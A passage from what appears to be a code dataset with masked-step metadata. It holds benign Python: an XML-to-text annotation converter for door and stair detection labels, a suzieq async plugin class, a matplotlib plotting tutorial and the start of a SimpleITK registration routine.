find('ymax').text) - int(member.find('bndbox').find('ymin')
.text), int(root.find('size')[0].text), int(root.find(
'size')[1].text)])
np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',
newline='\n')
print('Successfully converted xml to txt.')
ap = argparse.ArgumentParser()
ap.add_argument('-p', '--path', required=True, help='annotations path')
ap.add_argument('-o', '--output', required=True, help='txt output path')
args = vars(ap.parse_args())
print()
print()
print()
print(
'=========================================================================='
)
print(
' ATENTION '
)
print()
print(
' ATENTION '
)
print()
print()
print('Hi body - dont forget update CLASS NAMES')
print()
print(
'=========================================================================='
)
print()
print()
print()
run(args['path'], args['output'])
<|reserved_special_token_1|>
import os
import glob
import pandas as pd
import xml.etree.ElementTree as ET
import argparse
import numpy as np
def run(path, output):
#xml_df = xml_to_csv(path)
#xml_df.to_csv(output, index=None)
# for filename in os.listdir(path):
# base_file, ext = os.path.splitext(filename)
# print(base_file, ext)
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
base_file, ext = os.path.splitext(root.find('filename').text)
txtFileName = os.path.join(output, base_file+".txt")
l = []
for member in root.findall('object'):
#================ CLASS NAMES =======================
if member[0].text == 'opened_door':
iclass = 0
elif member[0].text == 'closed_door':
iclass = 1
elif member[0].text == 'elevator_door':
iclass = 2
elif member[0].text == 'ascending_stair':
iclass = 3
elif member[0].text == 'descending_stair':
iclass = 4
elif member[0].text == 'door':
iclass = 1
#class_number x1 y1 width height image_width image_height
l.append([iclass,
int(member.find('bndbox').find('xmin').text),
int(member.find('bndbox').find('ymin').text),
int(member.find('bndbox').find('xmax').text)-int(member.find('bndbox').find('xmin').text),
int(member.find('bndbox').find('ymax').text)-int(member.find('bndbox').find('ymin').text),
int(root.find('size')[0].text),
int(root.find('size')[1].text) ])
np.savetxt(txtFileName, np.asarray(l),fmt='%d', delimiter =' ',newline='\n')
print('Successfully converted xml to txt.')
#=============================================================================
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--path", required=True, help="annotations path")
ap.add_argument("-o", "--output", required=True, help="txt output path")
args = vars(ap.parse_args())
print()
print()
print()
print('==========================================================================')
print(' ATENTION ')
print()
print(' ATENTION ')
print()
print()
print('Hi body - dont forget update CLASS NAMES')
print()
print('==========================================================================')
print()
print()
print()
run(args["path"], args["output"])
|
flexible
|
{
"blob_id": "26d14bc74d893f6f14ee7405280f4af41854c544",
"index": 141,
"step-1": "<mask token>\n\n\ndef run(path, output):\n for xml_file in glob.glob(path + '/*.xml'):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n base_file, ext = os.path.splitext(root.find('filename').text)\n txtFileName = os.path.join(output, base_file + '.txt')\n l = []\n for member in root.findall('object'):\n if member[0].text == 'opened_door':\n iclass = 0\n elif member[0].text == 'closed_door':\n iclass = 1\n elif member[0].text == 'elevator_door':\n iclass = 2\n elif member[0].text == 'ascending_stair':\n iclass = 3\n elif member[0].text == 'descending_stair':\n iclass = 4\n elif member[0].text == 'door':\n iclass = 1\n l.append([iclass, int(member.find('bndbox').find('xmin').text),\n int(member.find('bndbox').find('ymin').text), int(member.\n find('bndbox').find('xmax').text) - int(member.find(\n 'bndbox').find('xmin').text), int(member.find('bndbox').\n find('ymax').text) - int(member.find('bndbox').find('ymin')\n .text), int(root.find('size')[0].text), int(root.find(\n 'size')[1].text)])\n np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',\n newline='\\n')\n print('Successfully converted xml to txt.')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef run(path, output):\n for xml_file in glob.glob(path + '/*.xml'):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n base_file, ext = os.path.splitext(root.find('filename').text)\n txtFileName = os.path.join(output, base_file + '.txt')\n l = []\n for member in root.findall('object'):\n if member[0].text == 'opened_door':\n iclass = 0\n elif member[0].text == 'closed_door':\n iclass = 1\n elif member[0].text == 'elevator_door':\n iclass = 2\n elif member[0].text == 'ascending_stair':\n iclass = 3\n elif member[0].text == 'descending_stair':\n iclass = 4\n elif member[0].text == 'door':\n iclass = 1\n l.append([iclass, int(member.find('bndbox').find('xmin').text),\n int(member.find('bndbox').find('ymin').text), int(member.\n find('bndbox').find('xmax').text) - int(member.find(\n 'bndbox').find('xmin').text), int(member.find('bndbox').\n find('ymax').text) - int(member.find('bndbox').find('ymin')\n .text), int(root.find('size')[0].text), int(root.find(\n 'size')[1].text)])\n np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',\n newline='\\n')\n print('Successfully converted xml to txt.')\n\n\n<mask token>\nap.add_argument('-p', '--path', required=True, help='annotations path')\nap.add_argument('-o', '--output', required=True, help='txt output path')\n<mask token>\nprint()\nprint()\nprint()\nprint(\n '=========================================================================='\n )\nprint(\n ' ATENTION '\n )\nprint()\nprint(\n ' ATENTION '\n )\nprint()\nprint()\nprint('Hi body - dont forget update CLASS NAMES')\nprint()\nprint(\n '=========================================================================='\n )\nprint()\nprint()\nprint()\nrun(args['path'], args['output'])\n",
"step-3": "<mask token>\n\n\ndef run(path, output):\n for xml_file in glob.glob(path + '/*.xml'):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n base_file, ext = os.path.splitext(root.find('filename').text)\n txtFileName = os.path.join(output, base_file + '.txt')\n l = []\n for member in root.findall('object'):\n if member[0].text == 'opened_door':\n iclass = 0\n elif member[0].text == 'closed_door':\n iclass = 1\n elif member[0].text == 'elevator_door':\n iclass = 2\n elif member[0].text == 'ascending_stair':\n iclass = 3\n elif member[0].text == 'descending_stair':\n iclass = 4\n elif member[0].text == 'door':\n iclass = 1\n l.append([iclass, int(member.find('bndbox').find('xmin').text),\n int(member.find('bndbox').find('ymin').text), int(member.\n find('bndbox').find('xmax').text) - int(member.find(\n 'bndbox').find('xmin').text), int(member.find('bndbox').\n find('ymax').text) - int(member.find('bndbox').find('ymin')\n .text), int(root.find('size')[0].text), int(root.find(\n 'size')[1].text)])\n np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',\n newline='\\n')\n print('Successfully converted xml to txt.')\n\n\nap = argparse.ArgumentParser()\nap.add_argument('-p', '--path', required=True, help='annotations path')\nap.add_argument('-o', '--output', required=True, help='txt output path')\nargs = vars(ap.parse_args())\nprint()\nprint()\nprint()\nprint(\n '=========================================================================='\n )\nprint(\n ' ATENTION '\n )\nprint()\nprint(\n ' ATENTION '\n )\nprint()\nprint()\nprint('Hi body - dont forget update CLASS NAMES')\nprint()\nprint(\n '=========================================================================='\n )\nprint()\nprint()\nprint()\nrun(args['path'], args['output'])\n",
"step-4": "import os\nimport glob\nimport pandas as pd\nimport xml.etree.ElementTree as ET\nimport argparse\nimport numpy as np\n\n\ndef run(path, output):\n for xml_file in glob.glob(path + '/*.xml'):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n base_file, ext = os.path.splitext(root.find('filename').text)\n txtFileName = os.path.join(output, base_file + '.txt')\n l = []\n for member in root.findall('object'):\n if member[0].text == 'opened_door':\n iclass = 0\n elif member[0].text == 'closed_door':\n iclass = 1\n elif member[0].text == 'elevator_door':\n iclass = 2\n elif member[0].text == 'ascending_stair':\n iclass = 3\n elif member[0].text == 'descending_stair':\n iclass = 4\n elif member[0].text == 'door':\n iclass = 1\n l.append([iclass, int(member.find('bndbox').find('xmin').text),\n int(member.find('bndbox').find('ymin').text), int(member.\n find('bndbox').find('xmax').text) - int(member.find(\n 'bndbox').find('xmin').text), int(member.find('bndbox').\n find('ymax').text) - int(member.find('bndbox').find('ymin')\n .text), int(root.find('size')[0].text), int(root.find(\n 'size')[1].text)])\n np.savetxt(txtFileName, np.asarray(l), fmt='%d', delimiter=' ',\n newline='\\n')\n print('Successfully converted xml to txt.')\n\n\nap = argparse.ArgumentParser()\nap.add_argument('-p', '--path', required=True, help='annotations path')\nap.add_argument('-o', '--output', required=True, help='txt output path')\nargs = vars(ap.parse_args())\nprint()\nprint()\nprint()\nprint(\n '=========================================================================='\n )\nprint(\n ' ATENTION '\n )\nprint()\nprint(\n ' ATENTION '\n )\nprint()\nprint()\nprint('Hi body - dont forget update CLASS NAMES')\nprint()\nprint(\n '=========================================================================='\n )\nprint()\nprint()\nprint()\nrun(args['path'], args['output'])\n",
"step-5": "import os\nimport glob\nimport pandas as pd\nimport xml.etree.ElementTree as ET\nimport argparse\nimport numpy as np\n\ndef run(path, output):\n #xml_df = xml_to_csv(path)\n #xml_df.to_csv(output, index=None)\n\n # for filename in os.listdir(path):\n # base_file, ext = os.path.splitext(filename)\n # print(base_file, ext)\n\n for xml_file in glob.glob(path + '/*.xml'):\n\n tree = ET.parse(xml_file)\n root = tree.getroot()\n\n base_file, ext = os.path.splitext(root.find('filename').text)\n txtFileName = os.path.join(output, base_file+\".txt\")\n\n l = []\n for member in root.findall('object'):\n\n #================ CLASS NAMES =======================\n if member[0].text == 'opened_door':\n iclass = 0\n elif member[0].text == 'closed_door':\n iclass = 1\n elif member[0].text == 'elevator_door':\n iclass = 2\n elif member[0].text == 'ascending_stair':\n iclass = 3\n elif member[0].text == 'descending_stair':\n iclass = 4\n elif member[0].text == 'door':\n iclass = 1\n \n #class_number x1 y1 width height image_width image_height\n l.append([iclass, \n int(member.find('bndbox').find('xmin').text), \n int(member.find('bndbox').find('ymin').text), \n int(member.find('bndbox').find('xmax').text)-int(member.find('bndbox').find('xmin').text), \n int(member.find('bndbox').find('ymax').text)-int(member.find('bndbox').find('ymin').text), \n int(root.find('size')[0].text), \n int(root.find('size')[1].text) ])\n\n np.savetxt(txtFileName, np.asarray(l),fmt='%d', delimiter =' ',newline='\\n') \n\n print('Successfully converted xml to txt.')\n\n#=============================================================================\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--path\", required=True, help=\"annotations path\")\nap.add_argument(\"-o\", \"--output\", required=True, help=\"txt output path\")\n\nargs = vars(ap.parse_args())\n\n\nprint()\nprint()\nprint()\nprint('==========================================================================')\nprint(' ATENTION ')\nprint()\nprint(' ATENTION ')\nprint()\nprint()\nprint('Hi body - dont forget update CLASS NAMES')\nprint()\nprint('==========================================================================')\nprint()\nprint()\nprint()\n\nrun(args[\"path\"], args[\"output\"])\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InventoryAsyncPlugin(SqPlugin):
<|reserved_special_token_0|>
async def run(self):
"""Background task to launch in order to execute the plugin"""
try:
await self._execute()
finally:
await self._stop()
@abstractmethod
async def _execute(self):
"""Launch the backuground task
"""
async def _stop(self):
"""Actions to execute before terminating the task
"""
return
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InventoryAsyncPlugin(SqPlugin):
"""Plugins which inherit this class will have methods 'run'
Once the controller check that the object inherit this class, it launches
a new task executing the run method.
"""
async def run(self):
"""Background task to launch in order to execute the plugin"""
try:
await self._execute()
finally:
await self._stop()
@abstractmethod
async def _execute(self):
"""Launch the backuground task
"""
async def _stop(self):
"""Actions to execute before terminating the task
"""
return
<|reserved_special_token_1|>
from abc import abstractmethod
from suzieq.shared.sq_plugin import SqPlugin
class InventoryAsyncPlugin(SqPlugin):
"""Plugins which inherit this class will have methods 'run'
Once the controller check that the object inherit this class, it launches
a new task executing the run method.
"""
async def run(self):
"""Background task to launch in order to execute the plugin"""
try:
await self._execute()
finally:
await self._stop()
@abstractmethod
async def _execute(self):
"""Launch the backuground task
"""
async def _stop(self):
"""Actions to execute before terminating the task
"""
return
|
flexible
|
{
"blob_id": "8b49aa63cc6e4490b7b22cd304dbba132962c870",
"index": 9049,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass InventoryAsyncPlugin(SqPlugin):\n <mask token>\n\n async def run(self):\n \"\"\"Background task to launch in order to execute the plugin\"\"\"\n try:\n await self._execute()\n finally:\n await self._stop()\n\n @abstractmethod\n async def _execute(self):\n \"\"\"Launch the backuground task\n \"\"\"\n\n async def _stop(self):\n \"\"\"Actions to execute before terminating the task\n \"\"\"\n return\n",
"step-3": "<mask token>\n\n\nclass InventoryAsyncPlugin(SqPlugin):\n \"\"\"Plugins which inherit this class will have methods 'run'\n\n Once the controller check that the object inherit this class, it launches\n a new task executing the run method.\n \"\"\"\n\n async def run(self):\n \"\"\"Background task to launch in order to execute the plugin\"\"\"\n try:\n await self._execute()\n finally:\n await self._stop()\n\n @abstractmethod\n async def _execute(self):\n \"\"\"Launch the backuground task\n \"\"\"\n\n async def _stop(self):\n \"\"\"Actions to execute before terminating the task\n \"\"\"\n return\n",
"step-4": "from abc import abstractmethod\nfrom suzieq.shared.sq_plugin import SqPlugin\n\n\nclass InventoryAsyncPlugin(SqPlugin):\n \"\"\"Plugins which inherit this class will have methods 'run'\n\n Once the controller check that the object inherit this class, it launches\n a new task executing the run method.\n \"\"\"\n\n async def run(self):\n \"\"\"Background task to launch in order to execute the plugin\"\"\"\n try:\n await self._execute()\n finally:\n await self._stop()\n\n @abstractmethod\n async def _execute(self):\n \"\"\"Launch the backuground task\n \"\"\"\n\n async def _stop(self):\n \"\"\"Actions to execute before terminating the task\n \"\"\"\n return\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def test_number():
pass
|
flexible
|
{
"blob_id": "687ab41e9ce94c8d14154a941504845a8fa9f2d9",
"index": 8660,
"step-1": "<mask token>\n",
"step-2": "def test_number():\n pass\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
import numpy as np
import matplotlib.pyplot as plt
##########################################
# line plot
#########################################
# x축 생략시 x축은 0, 1, 2, 3이 됨
"""
plt.plot([1, 4, 9, 16])
plt.show()
"""
# x축과 y축 지정
"""
plt.plot([10, 20, 30, 40], [1, 4, 9, 16])
plt.show()
"""
# 스타일지정
# 색깔, 마커, 선 순서로 지정함
# 색깔 : blue(b), green(g), red(r), cyan(c), magenta(m), yellow(y), block(k), white(w)
# 마커 : point(.), pixel(,), circle(o), triangle_down(v), triangle_up(^),
# triangle_left(<), triangle_right(>), tri_down(1), tri_up(2), tri_left(3),
# tri_right(4), square(s), pentagon(p), star(*), hexagon1(h),
# hexagon2(H), plus(+), x marker(x), diamond(D), thin_diamond(d)
# 선 : solid line(-), dashed line(--), dash-dot line(-.), dotted(:)
"""
plt.plot([1,4,9,16], 'bs:')
plt.show()
"""
# 기타스타일
# http://matplotlib.org/1.5.1/api/lines_api.html#matplotlib.lines.Line2D 참고
# color(c) : 선색깔
# linewidth(lw) : 선굵기
# linestyle(ls) : 선스타일
# marker : 마커종류
# markersize(ms) : 마커크기
# markeredgecolor(mec) : 마커 선 색깔
# markeredgewidth(mew) : 마커 선 굵기
# markerfacecolor(mfc) : 마커 내부 색깔
"""
plt.plot([1,4,9,16], c="b", lw=5, ls="--", marker="o", ms=15, mec="g", mew=5,
mfc="r")
plt.show()
"""
# 그림 범위지정
# xlim, ylim에서 최소, 최대값 지정
"""
plt.plot([1,4,9,16], c="b", lw=5, ls="--", marker="o", ms=15, mec="g", mew=5,
mfc="r")
plt.xlim(-10, 10)
plt.ylim(-10, 30)
plt.show()
"""
# 틱 설정
# 틱 : 플롯이나 차트에서 축상의 위치 표시 지점
# 틱라벨 : 틱 위에 써진 숫자 혹은 글자
# xticks, yticks로 틱라벨 지정
# 틱 라벨 문자열에는 $$사이에 LaTeX 수학 문자식 넣을수 있다
"""
X = np.linspace(-np.pi, np.pi, 256)
C = np.cos(X)
plt.plot(X, C)
plt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi])
plt.yticks([-1, 0, +1])
plt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi], [r'$-\pi$', r'$-\pi/2$',
'0', r'$+\pi/2$', r'$+\pi$'])
plt.yticks([-1, 0, +1], ["Low", "Zero", "High"])
plt.grid(False) # grid없애기
plt.show()
"""
# 여러개 선 그리기
# x, y, 스타일을 여러개 지정하면 됨
"""
t = np.arange(0., 5., 0.2)
plt.plot(t, t, 'r--', t, 0.5*t**2, 'bs:', t, 0.2*t**3, 'g^-')
plt.show()
"""
# 하나의 그림에 복수의 plot명령 적용 : 홀드
# hold(True) : 겹치기 시작
# hold(False) : 겹치기 종료
"""
plt.plot([1,4,9,16], c="b", lw=5, ls="--", marker="o", ms=15, mec="g", mew=5,
mfc="r")
plt.hold(True)
plt.plot([9,16,4,1], c="k", lw=3, ls=":", marker="s", ms=10, mec="m", mew=5,
mfc="c")
plt.hold(False)
plt.show()
"""
# 범례
# legent명령으로 범례 추가
# loc인수로 범례의 위치 지정
# loc : best(0), upper right(1), upper left(2), lower left(3),
# lower right(4), right(5), center left(6), center right(7)
# lower center(8), upper center(9), center(10)
"""
X = np.linspace(-np.pi, np.pi, 256)
C, S = np.cos(X), np.sin(X)
plt.plot(X, C, label="cosine")
plt.hold(True)
plt.plot(X, S, label="sine")
plt.legend(loc=5)
plt.show()
"""
# x축, y축 라벨, 타이틀
# xlabel, ylabel, title로 지정
"""
X = np.linspace(-np.pi, np.pi, 256)
C, S = np.cos(X), np.sin(X)
plt.plot(X, C, label="cosine")
plt.xlabel("time")
plt.ylabel("amplitude")
plt.title("Cosine Plot")
plt.show()
"""
# 부가설명
# annotate명령을 사용하여 그림내에 화살표를 포함한 부가 설명 넣을수 있음
"""
X = np.linspace(-np.pi, np.pi, 256)
S = np.sin(X)
plt.plot(X, S, label="sine")
plt.scatter([0], [0], color="r", linewidth=10)
plt.annotate(r'$(0,0)$', xy=(0, 0), xycoords='data', xytext=(-50, 50),
textcoords='offset points', fontsize=16,
arrowprops=dict(arrowstyle="->", linewidth=3, color="g"))
plt.show()
"""
# Figure [ Axes [ Axis] ] 의 구조이다
# Figure : 여러개의 윈도우를 띄우거나, 그림의 크기 지정시 사용
# plot사용시 자동으로 Figure를 생성하므로 명시적으로 생성할 필요는
# 없음
# figure객체를 얻으려면 gcf 명령 사용
"""
f1 = plt.figure(figsize=(100,2))
plt.plot(np.random.randn(100))
plt.show()
"""
"""
f1 = plt.figure(1)
plt.plot([1,2,3,4], 'ro:')
f2= plt.gcf()
print(f1, id(f1))
print(f2, id(f2))
plt.show()
"""
# Axes와 Subplot
# 하나의 윈도우(Figure)안에 여러개의 플롯을 배열하는 경우 각각의 플롯은
# Axes라고 불리는 객체에 속함
# subplot 명령으로 Axes객체를 생성, plot명령 사용시 자동으로 Axes를 생성함
# subplot은 그리드 형태의 Axes객체들을 생성
# Figure가 행렬(matrix)이고 Axes가 행렬의 원소라고 생각하면 됨.
# 위와 아래 두개의 플롯이 있는 경우 2X1행렬
# subplot은 3개의 인수를 가지고 처음 2개가 행렬 정의, 세번째가 위치 지정
"""
x1 = np.linspace(0.0, 5.0)
x2 = np.linspace(0.0, 2.0)
y1 = np.cos(2 * np.pi * x1) * np.exp(-x1)
y2 = np.cos(2 * np.pi * x2)
ax1 = plt.subplot(2, 1, 1)
plt.plot(x1, y1, 'yo-')
plt.title('A tale of 2 subplots')
plt.ylabel('Dampled oscillation')
print(ax1)
ax2 = plt.subplot(2, 1, 2)
plt.plot(x2, y2, 'r.-')
plt.xlabel('time (s)')
plt.ylabel('Undamped')
print(ax2)
plt.show()
"""
# subplot의 인수는 (2,2,1)를 줄여서 221로 표시 가능
"""
plt.subplot(221); plt.plot([1,2]); plt.title(1)
plt.subplot(222); plt.plot([1,2]); plt.title(2)
plt.subplot(223); plt.plot([1,2]); plt.title(3)
plt.subplot(224); plt.plot([1,2]); plt.title(4)
plt.tight_layout()
plt.show()
"""
# xkcd 스타일
X = np.linspace(-3, 3, 4096)
C = np.cos(X)
with plt.xkcd():
plt.title('XKCD style plot!!!')
plt.plot(X, C, label="cosine")
t = 2 * np.pi / 3
plt.scatter(t, np.cos(t), 50, color='blue')
plt.annotate(r'0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-90,
-50), textcoords='offset points', fontsize=16,
arrowprops=dict(arrowstyle="->", linewidth=3, color="g"))
plt.show()
|
normal
|
{
"blob_id": "89ffb2da456d2edf15fde8adc01615a277c6caa1",
"index": 8522,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith plt.xkcd():\n plt.title('XKCD style plot!!!')\n plt.plot(X, C, label='cosine')\n t = 2 * np.pi / 3\n plt.scatter(t, np.cos(t), 50, color='blue')\n plt.annotate('0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-\n 90, -50), textcoords='offset points', fontsize=16, arrowprops=dict(\n arrowstyle='->', linewidth=3, color='g'))\nplt.show()\n",
"step-3": "<mask token>\nX = np.linspace(-3, 3, 4096)\nC = np.cos(X)\nwith plt.xkcd():\n plt.title('XKCD style plot!!!')\n plt.plot(X, C, label='cosine')\n t = 2 * np.pi / 3\n plt.scatter(t, np.cos(t), 50, color='blue')\n plt.annotate('0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-\n 90, -50), textcoords='offset points', fontsize=16, arrowprops=dict(\n arrowstyle='->', linewidth=3, color='g'))\nplt.show()\n",
"step-4": "import numpy as np\nimport matplotlib.pyplot as plt\n<mask token>\nX = np.linspace(-3, 3, 4096)\nC = np.cos(X)\nwith plt.xkcd():\n plt.title('XKCD style plot!!!')\n plt.plot(X, C, label='cosine')\n t = 2 * np.pi / 3\n plt.scatter(t, np.cos(t), 50, color='blue')\n plt.annotate('0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-\n 90, -50), textcoords='offset points', fontsize=16, arrowprops=dict(\n arrowstyle='->', linewidth=3, color='g'))\nplt.show()\n",
"step-5": "import numpy as np\nimport matplotlib.pyplot as plt\n\n##########################################\n# line plot\n#########################################\n\n# x축 생략시 x축은 0, 1, 2, 3이 됨\n\"\"\"\nplt.plot([1, 4, 9, 16])\nplt.show()\n\"\"\"\n\n\n# x축과 y축 지정\n\"\"\"\nplt.plot([10, 20, 30, 40], [1, 4, 9, 16])\nplt.show()\n\"\"\"\n\n# 스타일지정\n# 색깔, 마커, 선 순서로 지정함\n# 색깔 : blue(b), green(g), red(r), cyan(c), magenta(m), yellow(y), block(k), white(w)\n# 마커 : point(.), pixel(,), circle(o), triangle_down(v), triangle_up(^),\n# triangle_left(<), triangle_right(>), tri_down(1), tri_up(2), tri_left(3),\n# tri_right(4), square(s), pentagon(p), star(*), hexagon1(h),\n# hexagon2(H), plus(+), x marker(x), diamond(D), thin_diamond(d)\n# 선 : solid line(-), dashed line(--), dash-dot line(-.), dotted(:)\n\"\"\"\nplt.plot([1,4,9,16], 'bs:')\nplt.show()\n\"\"\"\n\n\n# 기타스타일\n# http://matplotlib.org/1.5.1/api/lines_api.html#matplotlib.lines.Line2D 참고\n# color(c) : 선색깔\n# linewidth(lw) : 선굵기\n# linestyle(ls) : 선스타일\n# marker : 마커종류\n# markersize(ms) : 마커크기\n# markeredgecolor(mec) : 마커 선 색깔\n# markeredgewidth(mew) : 마커 선 굵기\n# markerfacecolor(mfc) : 마커 내부 색깔\n\"\"\"\nplt.plot([1,4,9,16], c=\"b\", lw=5, ls=\"--\", marker=\"o\", ms=15, mec=\"g\", mew=5,\n mfc=\"r\")\nplt.show()\n\"\"\"\n\n\n# 그림 범위지정\n# xlim, ylim에서 최소, 최대값 지정\n\"\"\"\nplt.plot([1,4,9,16], c=\"b\", lw=5, ls=\"--\", marker=\"o\", ms=15, mec=\"g\", mew=5,\n mfc=\"r\")\nplt.xlim(-10, 10)\nplt.ylim(-10, 30)\nplt.show()\n\"\"\"\n\n# 틱 설정\n# 틱 : 플롯이나 차트에서 축상의 위치 표시 지점\n# 틱라벨 : 틱 위에 써진 숫자 혹은 글자\n# xticks, yticks로 틱라벨 지정\n# 틱 라벨 문자열에는 $$사이에 LaTeX 수학 문자식 넣을수 있다\n\"\"\"\nX = np.linspace(-np.pi, np.pi, 256)\nC = np.cos(X)\nplt.plot(X, C)\nplt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi])\nplt.yticks([-1, 0, +1])\nplt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi], [r'$-\\pi$', r'$-\\pi/2$',\n'0', r'$+\\pi/2$', r'$+\\pi$'])\nplt.yticks([-1, 0, +1], [\"Low\", \"Zero\", \"High\"])\nplt.grid(False) # grid없애기\nplt.show()\n\"\"\"\n\n\n# 여러개 선 그리기\n# x, y, 스타일을 여러개 지정하면 됨\n\"\"\"\nt = np.arange(0., 5., 0.2)\nplt.plot(t, t, 'r--', t, 0.5*t**2, 'bs:', t, 0.2*t**3, 'g^-')\nplt.show()\n\"\"\"\n\n\n# 하나의 그림에 복수의 plot명령 적용 : 홀드\n# hold(True) : 겹치기 시작\n# hold(False) : 겹치기 종료\n\"\"\"\nplt.plot([1,4,9,16], c=\"b\", lw=5, ls=\"--\", marker=\"o\", ms=15, mec=\"g\", mew=5,\n mfc=\"r\")\nplt.hold(True)\nplt.plot([9,16,4,1], c=\"k\", lw=3, ls=\":\", marker=\"s\", ms=10, mec=\"m\", mew=5,\n mfc=\"c\")\nplt.hold(False)\nplt.show()\n\"\"\"\n\n\n# 범례\n# legent명령으로 범례 추가\n# loc인수로 범례의 위치 지정\n# loc : best(0), upper right(1), upper left(2), lower left(3),\n# lower right(4), right(5), center left(6), center right(7)\n# lower center(8), upper center(9), center(10)\n\"\"\"\nX = np.linspace(-np.pi, np.pi, 256)\nC, S = np.cos(X), np.sin(X)\nplt.plot(X, C, label=\"cosine\")\nplt.hold(True)\nplt.plot(X, S, label=\"sine\")\nplt.legend(loc=5)\nplt.show()\n\"\"\"\n\n# x축, y축 라벨, 타이틀\n# xlabel, ylabel, title로 지정\n\"\"\"\nX = np.linspace(-np.pi, np.pi, 256)\nC, S = np.cos(X), np.sin(X)\nplt.plot(X, C, label=\"cosine\")\nplt.xlabel(\"time\")\nplt.ylabel(\"amplitude\")\nplt.title(\"Cosine Plot\")\nplt.show()\n\"\"\"\n\n# 부가설명\n# annotate명령을 사용하여 그림내에 화살표를 포함한 부가 설명 넣을수 있음\n\"\"\"\nX = np.linspace(-np.pi, np.pi, 256)\nS = np.sin(X)\nplt.plot(X, S, label=\"sine\")\nplt.scatter([0], [0], color=\"r\", linewidth=10)\nplt.annotate(r'$(0,0)$', xy=(0, 0), xycoords='data', xytext=(-50, 50),\n textcoords='offset points', fontsize=16,\n arrowprops=dict(arrowstyle=\"->\", linewidth=3, color=\"g\"))\nplt.show()\n\"\"\"\n\n\n# Figure [ Axes [ Axis] ] 의 구조이다\n# Figure : 여러개의 윈도우를 띄우거나, 그림의 크기 지정시 사용\n# plot사용시 자동으로 Figure를 생성하므로 명시적으로 생성할 필요는\n# 없음\n# figure객체를 얻으려면 gcf 명령 사용\n\"\"\"\nf1 = plt.figure(figsize=(100,2))\nplt.plot(np.random.randn(100))\nplt.show()\n\"\"\"\n\"\"\"\nf1 = plt.figure(1)\nplt.plot([1,2,3,4], 'ro:')\nf2= plt.gcf()\nprint(f1, id(f1))\nprint(f2, id(f2))\nplt.show()\n\"\"\"\n\n\n# Axes와 Subplot\n# 하나의 윈도우(Figure)안에 여러개의 플롯을 배열하는 경우 각각의 플롯은\n# Axes라고 불리는 객체에 속함\n# subplot 명령으로 Axes객체를 생성, plot명령 사용시 자동으로 Axes를 생성함\n# subplot은 그리드 형태의 Axes객체들을 생성\n# Figure가 행렬(matrix)이고 Axes가 행렬의 원소라고 생각하면 됨.\n# 위와 아래 두개의 플롯이 있는 경우 2X1행렬\n# subplot은 3개의 인수를 가지고 처음 2개가 행렬 정의, 세번째가 위치 지정\n\"\"\"\nx1 = np.linspace(0.0, 5.0)\nx2 = np.linspace(0.0, 2.0)\ny1 = np.cos(2 * np.pi * x1) * np.exp(-x1)\ny2 = np.cos(2 * np.pi * x2)\n\nax1 = plt.subplot(2, 1, 1)\nplt.plot(x1, y1, 'yo-')\nplt.title('A tale of 2 subplots')\nplt.ylabel('Dampled oscillation')\nprint(ax1)\n\nax2 = plt.subplot(2, 1, 2)\nplt.plot(x2, y2, 'r.-')\nplt.xlabel('time (s)')\nplt.ylabel('Undamped')\nprint(ax2)\n\nplt.show()\n\"\"\"\n\n# subplot의 인수는 (2,2,1)를 줄여서 221로 표시 가능\n\"\"\"\nplt.subplot(221); plt.plot([1,2]); plt.title(1)\nplt.subplot(222); plt.plot([1,2]); plt.title(2)\nplt.subplot(223); plt.plot([1,2]); plt.title(3)\nplt.subplot(224); plt.plot([1,2]); plt.title(4)\nplt.tight_layout()\nplt.show()\n\"\"\"\n\n\n# xkcd 스타일\nX = np.linspace(-3, 3, 4096)\nC = np.cos(X)\n\nwith plt.xkcd():\n plt.title('XKCD style plot!!!')\n plt.plot(X, C, label=\"cosine\")\n t = 2 * np.pi / 3\n plt.scatter(t, np.cos(t), 50, color='blue')\n plt.annotate(r'0.5 Here', xy=(t, np.cos(t)), xycoords='data', xytext=(-90,\n -50), textcoords='offset points', fontsize=16,\n arrowprops=dict(arrowstyle=\"->\", linewidth=3, color=\"g\"))\nplt.show()\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def est_lin_transf(im_ref, im_mov, mov_mask=None, show_parameters=False):
initial_transform = sitk.CenteredTransformInitializer(im_ref, im_mov,
sitk.ScaleSkewVersor3DTransform(), sitk.
CenteredTransformInitializerFilter.MOMENTS)
lin_transformation = sitk.ImageRegistrationMethod()
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
